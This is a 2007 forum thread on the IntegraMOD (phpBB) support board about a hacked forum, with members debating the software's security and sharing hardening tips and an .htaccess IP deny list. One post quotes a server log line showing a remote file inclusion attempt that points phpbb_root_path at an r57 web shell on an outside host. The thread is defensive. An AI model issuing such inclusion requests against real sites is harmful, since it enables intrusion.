IntegraMOD

[WAM]

Your phpBB Version: 2.0.
phpBB Type: Integramod 141
MODs: No
Your knowledge: Advanced Knowledge
Board URL: http://www.worldandme.net

PHP Version:
MySQL Version:


What was done before the problem appeared?
out of the box install


What was done to try to solve the problem?
nothing yet



De.scription and Message

Today my site http://www.worldandme.net was hacked and redirects to http://208.101.34.12/~a7larab/usuud_alharb.ram

WAM

[Joshie]

Sadly, that what sadden me is that integramod is easily hacked.<img>

[WAM]

Any idea what to do now? I'm going for a plain phpbb without mods and a static website!

[WAM]

I'll check it out... but for now the dog needs a walk.

[Helter]

Sadly, that what sadden me is that integramod is easily hacked.<img>

this is a really dumb statement from someone who circumvented as many security features as possible. Integramod is much less likely to be hacked than vanilla phpbb.

[Joshie]

[quote=""HelterSkelter";p="27408""][quote=""Joshie";p="27399""]Sadly, that what sadden me is that integramod is easily hacked. Be sure to leave a little note in download files to warn them that integramod is easily to get hacked. Look around, few of people has stated that their site got hacked and only .script was integramod.

[DjPorkchop]

That statement is just a tad on the wrong side Joshie. I have run integramod 1.4.1 since the day it was released and yet to have been hacked. I have also NOT commented out any of the security features at all. They are there for a reason. The problem is not Integramod, it is phpBB. For years since it came out, it has been VERY hackable. In retrospect to the one or two people that have reported a hack lately, its not near as bad as the amount that was getting hit with the last version. Security updates were a very major thing in this update to make it not so "easily" hackable.

Leave Cracker Tracker as it was out of the box and use the update patch provided, and keep phpBB security in place and there wont be any issues.

It's not completely fair at all to bash a .script that is offered to use for FREE, that these kind folks here have put HUNDREDS and HUNDREDS of hours of their own time in when they could have been off doing their own family thing or something else. Minus a few bugs that Im quite sure will be worked out in the next release, it is a VERY stable .script.

Reinstall all of your security features then come back in a month and tell us how many times you got hacked. And when you do, dont bash, but explain what happened and what files were effected and all the pertinent info that you can provide so they can get on it as quick as they can. Bashing gets us no where real fast. Please be part of the solution and not part of the problem. <img>

[WAM]

I had the .script out of the box and got hacked 2 times within 3 weeks!

My solution: never ever Integramod!

Andrea

[viragotech]

No code is 100% unhackable. Not even MS or Apple can make a 100% secure code with all the money they have to fund projects.

Plus your just lucky or unlucky. Everyone gets hacked like everyone gets a cold. Doesn't happen to everyone at once but sooner or later a bug gets through. but it has very little to do with IM, its the core phpBB program.

Folks here did not invent phpBB, the just build off of it. Go fuss at the phpBB forum

[Helter]

Hondas are bad cars because they crash! Same logic.
We have had maybe a dozen posts about hacked forums in the last few years since ive been involved with IM. In that same time period there have been hundreds of "ive been hacked" posts on phpbb. Go to any open source or free forum site and count the posts.
Joshie, If you had any self-esteem, you would be thoughly embarassed by your post. You have only been here a short time and you have requested more help than most members who have been here for years - and you have recieved it. Many members have given you alot of thier time, and I cant even find a thank you from you to them, yet as soon as you let someone in your back door, your here slamming the project.
Funny thing is, you have a freelancer website. Do you know what a freelancer is? A freelancer is a developer for hire. Anyone running a freelancer website, or even being a member of one, should be able to do thier own setup, bug fixing, and feature integration. If not, they should at the very least be aware that PHP is INSECURE. Therefore ANY software designed to run on it is subject to the same insecurities.

[Joshie]

Hondas are bad cars because they crash! Same logic.
We have had maybe a dozen posts about hacked forums in the last few years since ive been involved with IM. In that same time period there have been hundreds of "ive been hacked" posts on phpbb. Go to any open source or free forum site and count the posts.
Joshie, If you had any self-esteem, you would be thoughly embarassed by your post. You have only been here a short time and you have requested more help than most members who have been here for years - and you have recieved it. Many members have given you alot of thier time, and I cant even find a thank you from you to them, yet as soon as you let someone in your back door, your here slamming the project.
Funny thing is, you have a freelancer website. Do you know what a freelancer is? A freelancer is a developer for hire. Anyone running a freelancer website, or even being a member of one, should be able to do thier own setup, bug fixing, and feature integration. If not, they should at the very least be aware that PHP is INSECURE. Therefore ANY software designed to run on it is subject to the same insecurities.

Yet, that means don't considering me as a freelancer, I just open the website as for freelancers to communicates with other web masters/freelancers.

And, please open your eyes, I have thanked people for the works, you can even ask breck (quack major.pain) because I thanked him for the workds, and some of others people. Why would I want to thank someone that don't solve with the problems I had? Nah, I am not embarrased. I mean I do like integramod. I am just giving a complaints by my honest. If someone, or you make integramod of more without getting chance to get hacked than that's great! That would be basically better .scripts than any others.

[Helter]

as Ive said before, it is not possible to make hack proof software. Look at Adobe with their bottomless bank accounts. They cannot keep ppl from hacking thier registration codes and illegally using thier software. The fact is, if you are popular, your in the spotlight and phpbb is very popular. This gets the attention of all the hackers and the wannabe famous .script kiddies. Welcome to the web.

ps... the fact that your not embarrased, says alot about you...

[Joshie]

I had the .script out of the box and got hacked 2 times within 3 weeks!

My solution: never ever Integramod!

Andrea

Lol!

as Ive said before, it is not possible to make hack proof software. Look at Adobe with their bottomless bank accounts. They cannot keep ppl from hacking thier registration codes and illegally using thier software. The fact is, if you are popular, your in the spotlight and phpbb is very popular. This gets the attention of all the hackers and the wannabe famous ..script kiddies. Welcome to the web.

ps... the fact that your not embarrased, says alot about you...

Ah, that explains a lot about "this gets the attention of all the hackers".

What do you mean. The fact that I am not embarrassed, says a lot about me?

But, however. I apologize for being snapped out, it's just didn't like it when the site gets hacked.

<img>:D

[viragotech]

hehehehehe

Case in point one of my other fav forums

http://bpgforums.com/

Its hacked n defaced as I type.
Its not a IM forum BTW. it fancy pricy Vbullitin

[Joshie]

That statement is just a tad on the wrong side Joshie. I have run integramod 1.4.1 since the day it was released and yet to have been hacked. I have also NOT commented out any of the security features at all. They are there for a reason. The problem is not Integramod, it is phpBB. For years since it came out, it has been VERY hackable. In retrospect to the one or two people that have reported a hack lately, its not near as bad as the amount that was getting hit with the last version. Security updates were a very major thing in this update to make it not so "easily" hackable.

Leave Cracker Tracker as it was out of the box and use the update patch provided, and keep phpBB security in place and there wont be any issues.

It's not completely fair at all to bash a .script that is offered to use for FREE, that these kind folks here have put HUNDREDS and HUNDREDS of hours of their own time in when they could have been off doing their own family thing or something else. Minus a few bugs that Im quite sure will be worked out in the next release, it is a VERY stable .script.

Reinstall all of your security features then come back in a month and tell us how many times you got hacked. And when you do, dont bash, but explain what happened and what files were effected and all the pertinent info that you can provide so they can get on it as quick as they can. Bashing gets us no where real fast. Please be part of the solution and not part of the problem. <img>

Do any one of you have a patch for update secruity? That might be the problems because I don't see any where for the patch for the updates.

[.QUACK.Major.Pain]

There's was a patch a while back.

If there has been a more recent one, I haven't seen it.

A sugggestion would be that patches be posted seperate as a sticky. The last CT update was hidden inside another post and didn't know it was there until I read the whole thing.

Updates should also be known and promoted. A mass email to everyone of an update with a link to the download would be appreciated.

Thanks lads n gals!!

[CaNNon]

I don't get how going to plain php will help. I mean You've gone from a software that has 2 security systems to none?

I had my site defaced once since i started with IM and using CT's file checker to id the 2 changed files I had the site back up in 2 minutes. I just ftp copies of the changed files from my off site backup.

3 biggest things you have to do no matter what you run is keep a up to date ftp backup, learn to use .htaccess and chmod permissions.

[Helter]

There's was a patch a while back.

If there has been a more recent one, I haven't seen it.

A sugggestion would be that patches be posted seperate as a sticky. The last CT update was hidden inside another post and didn't know it was there until I read the whole thing.

Updates should also be known and promoted. A mass email to everyone of an update with a link to the download would be appreciated.

Thanks lads n gals!!

these ctracker patches released so far, do not add any additional security, they only allow admins to make more changes to thier boards without the dreaded CTracker block. Any important security patches will definatley be stickied, and if it is a critical patch, it will appear in your ACP index in the Integramod news section

[.QUACK.Major.Pain]

Cool good to know.

I knew the CT was for all the errors.

[viragotech]

wish it could block commands like this

"phpbb_root_path="

74.52.9.162 - - [19/Jul/2007:23:57:29 -0400] "GET /link_main.php?phpbb_root_path=http://usuarios.lycos.es/magoop/r57.txt?? HTTP/1.1" 403 - "-" "libwww-perl/5.805"

My site keeps getting shut down for to much traffic but its not my users. Its the hackers trying desperatly to hack in but they can't. and blocking domain or IPs don't work as daily its differnet ones. never the same ones each day.

I got log files 10 miles long and most of it is hackers tryin n tryin to get in, they can't but they won't stop either.

[CaNNon]

So your banning the ip of the prox server each time in your .htaccess file?

and that part of the htaccess file looks something like this?


# prox banning
# Banned Ip's (re: .scripts run give active prox ip's)
# date bans (as prox will become useless in time)
order allow,deny
# july 16/07
deny from 91.121.14.227
# july 15/07
deny from 87.106.61.17
deny from 69.132.66.205
# pre july 12/07
deny from 38.99.44.103
deny from 66.199.227.66
deny from 72.29.94.232
deny from 75.126.70.242
deny from 81.169.178.78
deny from 81.223.85.66
deny from 84.19.188.111
deny from 87.233.134.199
deny from 189.5.160.101
deny from 195.140.142.113
deny from 195.199.227.210
deny from 200.103.160.149
deny from 200.215.129.70
deny from 201.66.46.225
deny from 216.120.237.36
deny from 216.222.193.2
allow from all


Because doing it this way they get a 400 type error and don't get to the site.
Thats my last weeks additions. I was getting hit as much as 20 times from one working prox and each time they would try a different .script.